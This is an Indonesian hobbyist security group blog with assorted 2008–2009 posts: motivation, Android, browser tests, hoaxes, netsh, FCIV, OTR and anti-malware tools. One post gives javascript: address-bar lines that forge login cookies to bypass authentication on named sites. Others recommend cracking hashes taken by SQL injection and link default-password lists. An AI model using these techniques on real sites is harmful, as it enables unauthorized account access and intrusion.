kanabies

Your Escape Tunnel

kernellicious — Tue, 29 Sep 2009 07:48:43 +0000

by Anthony on September 13, 2006

=====================
In today’s pressure-filled society, it is easy to feel as though you are trapped inside ‘The System’. Many people feel trapped by their job and their financial circumstances and find themselves yearning for freedom.
This freedom involves not only financial freedom, but also the freedom to do what you want, when you want, with who you want. Perhaps you can relate to the following picture?

In an effort to break free from ‘The System’, many people investigate different options for creating passive income such as share trading, property investing, network marketing or starting a business.
Each of these options is like starting to dig an escape tunnel that can lead you to freedom from the system as shown below.

But here is the biggest mistake mistake that people make…
They begin to dig their escape tunnel and initially make some progress, but then things start to get tough, so they give up on their tunnel and decide to start digging a different tunnel.
For example, you buy an investment property and then have a bad experience with a tenant. At the same time you hear about a ‘revolutionary’ new share trading system that is guaranteed to work, so you stop digging your property investing tunnel and start digging a share trading tunnel.

This situation is sometimes known as ‘opportunity hopping’
The problem with opportunity hopping is that the end result is usually this:
You end up doing a lot of digging but remain trapped in ‘The System’ with multiple escape tunnels that lead nowhere.
So what’s the answer?
The answer is *FOCUS*.
To achieve the freedom you desire, you must carefully review your options and then commit yourself to focusing on the tunnel that you believe will give you the best chance of success.
This opportunity you choose is up to you and depends on your personality, your skills, and most importantly – what you enjoy.
By committing to one tunnel and focusing all your energies on consistent digging, you will maximize your chances of achieving the freedom you and your family deserve.

*Action Steps:*
This week, take time to really sit down and review all the ‘projects’ and ‘ideas’ you have been working on and ask yourself these two important questions.
(1) Which opportunity am I most passionate about?
(2) Which opportunity do I believe offers me the greatest chance of success?
When you can answer these two questions, commit to your escape tunnel and
keep digging!
Until next time,
Dare To Dream!

===========

dikutip dari Amir SH

WBR
kernellicious

web based Hash(-ing)

-- — Fri, 05 Jun 2009 11:56:11 +0000

apa sich software tuk cek nilai hash

kemaren ada yang nyasar ke blog ini ama kata kunci itu
saya orangnya pemalas dan rada parno ama software gratisan … takutnya disisipin trojan di softwarenya dan ga ke detect ama antivitus+update terbarunya sekalipun

makanya untuk hash-ing (convert to/reverse) saya lebih suka “web based hash(-ing)” (makin parah ajah ni kosakata IT nya :p) … beberapa situs yang saya suka pake:
-passcracking
-benramsey
-hashcrack
-reversehas
-dustinfineout

Kenapa link2 diatas? soalnya saya sering nemu “jawaban” dari hasil sql injection disana ,databasenya lumayan okeh … trus beberapa link diatas udah pake kombinasi teknik: classic rainbow tables, hybrid rainbow tables, & dictionary … dan yang paling penting: gratis, ga usah registrasi, & ga perlu install

javascript injection

-- — Sat, 23 May 2009 10:20:27 +0000

lagi nyari informasi tentang sql injection trus “nyasar” ke sekuritionline … eh malah dapet informasi tentang javascript
celah ini juga sudah di publish di beberapa website sekuriti lain, termasuk secunia.

berikut ini beberapa situs yang masih belum di patch waktu saya coba:
ebook
hotscripts
rss
membership
recipe

cukup masukan javascript berikut ke address bar di browser:

javascript:document.cookie = “username=kanabies; path=/”;

javascript:document.cookie = “password=kanabies; path=/”;

perintah itu akan membuat username dan password: kanabies
hal ini bisa dicek dengan memasukan salah satu syntax berikut ke address bar di browser:

javascript:alert(document.cookie)

javascript:alert(unescape(document.cookie))

javascript:alert(unescape(document.cookie).replace(/;/gi,”\n\n”))

javascript:alert(unescape(unescape(document.cookie)).replace(/;/gi,”\n\n”))

setelah itu kita bisa masuk ke menu yang ada dan menjalankan perintah/fitur yand ada

di firefox ada addon yang khusus untuk mengedit cookies:
firefox-addons

CMIIW,
ga ada sql … javascript pun jadi

sumber:
sekuritionline
jammed
javaranch

Secunia- Personal Software Inspector (PSI)

-- — Tue, 19 May 2009 05:43:34 +0000

Untuk menjaga keamanan aplikasi-aplikasi yang terinstall di komputer kita ada baiknya apabila kita selalu meng-update patches atau menginstall versi terbaru dari aplikasi-aplikasi yang kita gunakan. Secunia, computer security service provider dari denmark yang didirikan oleh Niels Henrik Rasmussen dan Thomas Kristensen, membuat sebuah aplikasi gratis (untuk penggunaan personal) yang membantu kita untuk men-scan&udpate dari masing2 aplikasi yang terinstall di komputer kita. Selain untuk meng-update aplikasi yang ada, secunia juga bisa untuk men-scan virus. Adapun produk yang dikembangkan oleh mereka adalah:
-Enterprise Security Manager
-Vulnerability Tracking Service
-Surveillance Scanner
-Network Software Inspector
-Personal Software Inspector
-Online Software Inspector

Beikut fitur utama secunia-PSI:
-Scan, melakukan scan terhadap program-program yang ada di komputer
-Insecure Program, memberikan informasi program yang “kurang aman” dan memberikan informasi link download program terbaru atau solusinya, add/remove program, referensi online, detail dan sebagainya.
-End of Life, memberikan informasi program yang tidak di support lagi oleh vendor pembuatnya. Disertai link download versi terbaru atau untuk uninstall.
-Patched, memberikan informasi program yang dideteksi, tetapi diketahui tidak mempunyai update security (jadi mungkin tidak memerlukan perhatian yang lebih)
-Overview, memberikan informasi (gambaran umum) kondisi komputer setelah di scan.

Di ZDNet, Secunia PSI masuk daftar 10 besar Essential security tools, dan berada di urutan pertama dalam kategori free software. Aplikasi ini hanya berukuran sekitar 521 KB dan bisa berjalan di platform Windows 2000, XP 32/64bit, dan Vista 32/64bit. Agar bisa berjalan (Scan) maka perlu adanya koneksi internet.

Link:
en.wikipedia.org
download PSIsetup.exe
advisories

CMIIW,
Stay secure

google android

-- — Tue, 19 May 2009 04:54:52 +0000

Android adalah mobile OS yang dikembangkan dari kernel linux v2.6 (monolithic) oleh android.inc yang kemudian diakuisisi oleh google dan kemudian dilanjutkan pengembangannya oleh Open Handset Alliance (OHA), yang merupakan aliansi bersama antara beberapa perusahaan terkenal. android nantinya akan bertarung melawan mobile OS lainnya seperti: symbian, windows mobile, blackberry, dan mac. Meskipun awalnya dikembangkan sebagai mobile OS , Programmer dari US bernama Krzykowski dan Daniel Hartmann memaparkan hasil percobaan mereka di blognya bahwa mereka berhasil menginstall android di netbook Asus Eee PC meskipun menurut mereka masih banyak kekurangannya.

Beberapa kritik tentang android:
-biarpun dikembangkan dari kernel linux, android tidak mensupport full set of standard Linux libraries, termasuk GNU C Library yang mengakibatkan android sulit untuk menggunakan aplikasi atau libraries Linux yang sudah ada
-Android tidak memakai Java standards yang sudah berkembang, contohnya: Java SE and ME, ini membuat kompatibilitas antara aplikasi yang ditulis menggunakan Java dengan aplikasi platform Android menjadi tidak kompatibel.
-Android tidak memperbolehkan aplikasi diinstall melalui memory card.

Beberapa link tentang android:
android.com
code.google.com
en.wikipedia.org
video android

CMIIW.
Shoutz for all member
ps: kalo migrate dah selese mo pake CMS apa?

Best browser?

-- — Mon, 18 May 2009 08:34:35 +0000

banyak banget browser yang ada sekarang ini, walaupun ga bisa disangkal kalo IE(Internet Explorer) adalah browser paling banyak digunakan. Tapi sekarang ini para pengguna komputer, khususnya para pengguna internet mulai mencari alternatif browser selain IE, dan mungkin yang paling terkenal adalah firefox, tapi benarkah firefox adalah browser yang paling bagus? Bagus atau tidak nya suatu browser bisa jadi relatif menurut cara pandang pengguna. untuk itu organisasi bernama: The Web Standards Project membuat standardisasi untuk menginterpretasikan HTML, CSS, dan Javascript sesuai standard W3C, adapun situs khusus untuk men-test browser kesayangan kalian: http://www.acidtests.org/ (kalian bisa menemukan+baca dokumentasi tentang acid disini)

Ada tiga tahap untuk mengecek browser2 ini:

-acid1
-acid2
-acid3

Acid reference result:
-acid1:
-acid2:
-acid3:

Di bawah ini contoh hasil test untuk beberapa browser terkenal:
-Sciactive
-anomalousanomaly

Cukup kaget juga … baru tau ternyata browser sekelas firefox pun ga lulus acid 2+3 … cuman safari ama opera versi terbaru yang lolos acid2+3

Dari beberapa test yang saya lakukan dan beberapa referensi hasil test dari situs2 lain … semuanya menempatkan safari sebagai yang pertama di ikuti oleh opera di tempat kedua, safari lolos semua test acid yang ada dan unggul dari segi kecepatan dalam mengakses situs yang dituju. Jadi kesimpulannya safari adalah browser terbaik? Menurut anda?

CMIIW,
Shoutz for all K* member

(don’t) Pass the Hoax

-- — Thu, 14 May 2009 00:09:42 +0000

“apapun beritanya … minumnya teh botol sosro “

“Re-Check before pass it on”… mungkin itu bisa jadi solusi yang jitu untuk mengurangi penyebaran hoax … seringkali kita hanya baca sekilas dan kemudian maen terusin ke orang lain, atau mungkin yang lebih parahnya, di forward ke milis2 … atau mungkin juga kita sudah baca keseluruhan dan masih tetep ikut menyebarkan pesen yang ternyata hoax, karena mengira itu adalah berita yang valid dan beguna bagi orang lain

ya … sekarang banyak banget hoax yang “asli” … maksudnya saking pinternya yang bikin hoax ampe susah bedain/nentuin kalo ternyata berita itu palsu … kaya berita di bawah ini:

http://www.detikinet.com/read/2009/05/11/133018/1129478/398/teh-botol-sosro-jadi-korban-e-mail-tipuan

kekekekeke … si pengirim hoax (hoaxer? ) pake jurus “sayang anak” untuk mengelabui para pembaca (mungkin targetnya orang tua yang concern abis ama kesehatan anaknya) … trus si hoaxer bawa2 pengesahan dari sumber terpercaya seperti “Universitas terkenal di Amerika” dan sumber/pakar: Dr. Priyadi Handoko, ahli kesehatan dari IKDN … dan seperti biasa … last but not least … the magic word of hoax: “pass/spread the news (hoax)!”

sang pembuat hoax itu terang2an mengakui kalo dia yang buat berita hoax itu … setelah baca di blognya, http://hariadhi.wordpress.com/2009/05/08/kronologis-hoax-teh-botol-sosro/ ternyata dia sengaja membuat berita hoax itu untuk bahan diskusi tentang “negative approach” di komunitas CCI (creative_circle_ind) dan ternyata ada yang nyebarin email tersebut di luar komunitas itu

pesan moral:

-selalu crosscheck pesan/berita sebelum meneruskannya ke orang lain, google dan wikipedia bisa jadi salah satu sarana pencarian yang bisa diandalkan

-kreatif tanpa tanggung jawab bisa berakibat kriminal …. boleh kreatif tapi jangan ngerugiin orang lain donk … pasti si hoaxer sosro ini juga ga mau kan dibilang orang sakit jiwa ama orang lain (yang bakal bilang misalnya kalo dia lagi diskusi tentang “psikologis marketing” dengan si hoaxer sosro sebagai kelinci percobaannya )

-hati2 dengan perkataan anda, bisa jadi pihak yang terkait akan melayangkan tuntutan kepada anda … denda uang/hukuman penjara bisa jadi menanti

berikut sanggahan dari pihak sosro:

http://sosro.com/Klarifikasi-Tehbotol-Sosro-Mengenai-HOAX-Hydroxilic-Acid.php

dan permintaan maaf dari hoaxer

http://hariadhi.wordpress.com/2009/05/07/permintaan-maaf-untuk-teh-botol-sosro/

kalo kata orang jawa bilang sih: “onno-onno w purbo” … yang artinya: “ada2 aja”

ayo tebak berita ini bener apa hoax:

http://www.detikinet.com/read/2009/04/22/111816/1119486/323/nokia-1100-bekas-laku-rp-300-juta

… be a smart reader … don’t get fooled by fool …

CMIIW,

SGK

*Shout for other members … kapan nih migratenya

*forward berita ini ke semua orang yang anda sayangi supaya mereka tidak ikut menyebarkan berita hoax :p

3rd party sites

-- — Sun, 07 Dec 2008 05:58:11 +0000

===============================================================================
title: 3rd party sites
post author: SGK
date posted: december, 7th 2008
posted in: Tips&Trick
===============================================================================suka donlot dari youtube? bingung cara donlotnya? daripada install software yang ga jelas mendingan pake 3rd party sites a.k.a situs perantara, ini beberapa link diantaranya:

links:

vixy
situs ini punya pilihan jenis&kualitas video :

MP4 (H.264 + AAC) for iPod/PSP/etc
FLV (VP6 + MP3) for Flash 8+
FLV (H.263 + MP3) for Flash 7+

keepvid
situs ini yang paling sering saya pake.

CMIIW,
SGK

fciv

-- — Sun, 07 Dec 2008 05:48:16 +0000

================================================================================
title: fciv
post author: SGK
date posted: december, 7th 2008
posted in: Tips&Trick
================================================================================
singkatnya sih fciv tuh buat ngecek nilai hash dari suatu file buat nentuin file itu original apa kaga.
quoted from kb841290

The File Checksum Integrity Verifier (FCIV) is a command-prompt utility that computes and verifies cryptographic hash values of files. FCIV can compute MD5 or SHA-1 cryptographic hash values. These values can be displayed on the screen or saved in an XML file database for later use and verification.

installernya bisa didownload disini

Contoh penggunaan:
(file fciv.exe gw ekstrak di C:\desktop trus file yg gw mau cek ada di g:\flashdisk)

C:\Desktop>fciv.exe “G:\flashdisk\yu.zip”
//
// File Checksum Integrity Verifier version 2.05.
//
6c45a7f3c4834467786d76dd44de339b g:\flashdisk\yu.zip

CMIIW,
SGK
================================================================================
source:
http://support.microsoft.com/kb/841290

netsh

-- — Sun, 07 Dec 2008 04:04:09 +0000

===============================================================================
title: netsh
post author: SGK
date posted: december, 7th 2008
posted in: Tips&Trick
===============================================================================
mau konfigurasi/seting TCP/IP di OS windows dari command prompt? coba deh pake netsh

Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh.exe also provides a scripting feature that allows you to run a group of commands in batch mode against a specified computer. Netsh.exe can also save a configuration script in a text file for archival purposes or to help you configure other servers.

Netsh.exe cuman ada di Windows XP, 2000, ama 2003

You can use the Netsh.exe tool to perform the following tasks:

Configure interfaces
Configure routing protocols
Configure filters
Configure routes
Configure remote access behavior for Windows-based remote access routers that are running the Routing and Remote Access Server (RRAS) Service
Display the configuration of a currently running router on any computer
Use the scripting feature to run a collection of commands in batch mode against a specified router.

view your TCP/IP settings

C:\netsh interface ip show config

configure your computer’s IP address and other TCP/IP related settings
contoh: konfigurasi interface bernama:”Local Area Connection” menggunakan alamat IP statik:192.168.1.100, subnet mask:255.255.255.0, dan default gateway:192.168.1.1

netsh interface ip set address name=”Local Area Connection” static 192.168.1.100 255.255.255.0 192.168.1.1

export your current IP settings

netsh -c interface dump > c:\location1.txt

import your IP settings

netsh -f c:\location1.txt

netsh exec c:\location2.txt

automatically obtain an IP address from a DHCP server

netsh interface ip set address “Local Area Connection” dhcp

configure DNS and WINS addresses

netsh interface ip set dns “Local Area Connection” static 192.168.0.200 (Just replace DNS with WINS for WINS server info)

dynamically obtain it’s DNS settings

netsh interface ip set dns “Local Area Connection” dhcp

enjoy,
SGK
===============================================================================
sumber referensi:
www.petri.co.il
www.mydasd.com

otr

-- — Sun, 07 Dec 2008 03:53:41 +0000

===============================================================================
title: otr
post author: SGK
date posted: december, 7th 2008
posted in: Tips&Trick
===============================================================================
otr itu adalah: “a cryptographic protocol that provides strong encryption for instant messaging conversations.” – baca lengkap disini

adapun fungsi dari otr adalah:

Off-the-Record (OTR) Messaging allows you to have private conversations over instant messaging by providing:

Encryption: No one else can read your instant messages.
Authentication: You are assured the correspondent is who you think it is.
Deniability: The messages you send do not have digital signatures that are checkable by a third party. Anyone can forge messages after a conversation to make them look like they came from you. However, during a conversation, your correspondent is assured the messages he sees are authentic and unmodified.
Perfect forward secrecy: If you lose control of your private keys, no previous conversation is compromised.

otr bisa digunakan untuk:
Adium+Adium X
Trillian
pidgin
gaim

gw baru nyoba untuk install otr di adium + pidgin. tapi dari testing kemaren gw (pake adium di mac) blon bisa untuk tuker enkripsi key ama kitsuensha (pake pidgin di windows) … tapi kalo antar sesama jenis (adium+otr proxy ke adium+otr proxy … atau pidgin+otr ke pidgin+otr) sih bisa … mungkin karena kalo si adium pake plugin otr yg proxy kayanya (sotai mode: on) … nanti ada tanda gembok ama fingerprint id kalo dah berhasil tukeran encrypt keynya

lha untuk YM mana? hahahaha … hari gini masih pake YM???

peace,
SGK
===============================================================================
source:
cypherpunks
wikipedia
list supported OS
otr Messaging protocol

dpl

-- — Sun, 07 Dec 2008 01:41:09 +0000

=================================================================================
title: dpl
post author: SGK
date posted: december, 7th 2008
posted in: Tips&Trick
=================================================================================
dpl a.k.a default password list
percaya deh ama gw … someday lu pasti butuh … entah buat penetration purpose atau sekedar login ke router/switch buat configure …

defaultpassword
phenoelit

enjoy,
SGK

fullfilling destiny – till the last drop of blood!!!

-- — Sun, 07 Dec 2008 01:35:58 +0000

================================================================
title: fullfilling destiny – till the last drop of blood!!!
post author: SGK
date posted: December, 7th 2008 (draft made: july, 7th 2008 )
posted in: Junk
================================================================

wiiiihhh…cadas ga nih judul!!! memenuhi takdir…ampe titik darah penghabisan!! ya kira2 gitulah…sori kalo ada salah2 kata(translasi)…hehehehe….lagi2 curhat, kalo lagi gini ga ada ide/minat buat nulis tentang artikel teknis…bermula dari pertanyaan di echo beberapa waktu lalu tentang “why did you wanna be a hacker?” maka jawaban gw adalah: “it’s my destiny!”…wakakakakaka…pasti semua langsung pada ketawa…

nobody said it was easy…(but)no one ever said it’ll be this hard…” coldplay – the scientist

beuh…lagu itu terngiang-ngiang di telinga selama beberapa minggu ini…
emppphhh……huuuaauah…*
*sfx(sound effects): helaan napas panjang…

soundtrack versi indonesianya sih: d’massiv – “(this job)is killing me”

minggu ini minggu yang berat…berat soalnya ga ada kerjaan yang beres…dimarahin kiri-kanan…depan-belakang (lebay mode: on)

badai pasti berlalu – chrisye

iya…tapi kapan???…

iseng2 googling pilem kungpu-panda … eh bukannya dapet previewnya malah dapet petuah2nya:

One often meets his destiny on the road he takes to avoid it. oogway – kungfu panda

ni quote kena banget! dulu gw ngarep banget bisa dapetin kerja yang related ama it security…sekarang pas dapet malah ngeluh…itulah…inilah…

Yesterday is history, tomorrow is a mystery, but today is a gift. That is why it is called the present. oogway – kungfu panda

… ah … bersyukur … susah banget sih ngelakuinnya???
================================================================================
ps: ini tulisan 5 bulan lalu … dan ampe sekarang masih belon bisa ngelakuin apa yg namanya bersyukur … argh!!!

Shame on me,
SGK

mbam+sas = clean

-- — Sun, 07 Dec 2008 00:05:59 +0000

================================================================================
title: giving up my dream?
post author: SGK
date posted: December, 7th 2008
posted in: Tips&Trick
================================================================================
mbam? sas? hehehehe … kedua singkatan itu adalah:
1. mbam = Malwarebytes’ Anti-Malware
2. sas = superantispyware

yups sesuai namanya software ini berfungsi buat nge-scan computer yg terindikasi kena malware:virus/spyware/trojan dkk. both of them are tested, and so far belom ada user yg komplen lagi setelah gw scan kompi mereka ama software ini … so far so good

dulu sih gw suka pake spybot, tapi masih suka muncul lagi si malwarenya jadi gw googling lagi and ketemu deh duo-antimalware ini

kalo mbam harus diinstall dulu, tapi kalo sas ga usah. selama ini gw lebih sering pake quick scan, dan si malware langsung ilang. selamat mencoba

CMIIW
================================================================================
donlot: mbam | sas

giving up my dream?

-- — Sat, 06 Dec 2008 08:47:20 +0000

================================================================================
title: giving up my dream?
post author: SGK
date posted: December, 6th 2008
posted in: Junk
================================================================================

“Dunia ini terobsesi dengan kesuksesan. Seolah kita harus berkorban untuk meraih itu. Pada akhirnya kita ini hanyalah angka statistik” – antonio cassano (AS Roma stiker)

mantep banget nih quote … baca deh artikel ini:
aku-hanya-antonio-cassano

bikin gw mikir lagi tentang semuanya … re-construct cara pikir gw … dari dulu gw selalu terobsesi akan sesuatu … diantaranya: cewe , sepakbola, basket, komputer, dll … sekarang gw mulai berpikir kalo itu semua bukan segalanya tetapi sekadar bagian dari hidup gw yg dijalanin sambil dinikmatin, bukan dikejar kemudian dijadiin obsesi …

atau mungkin artikel ini cuman jadi alesan buat gw giving up my dream? mungkin … lagi pengen enjoy life … cape nomaden kerjaan
peace ah …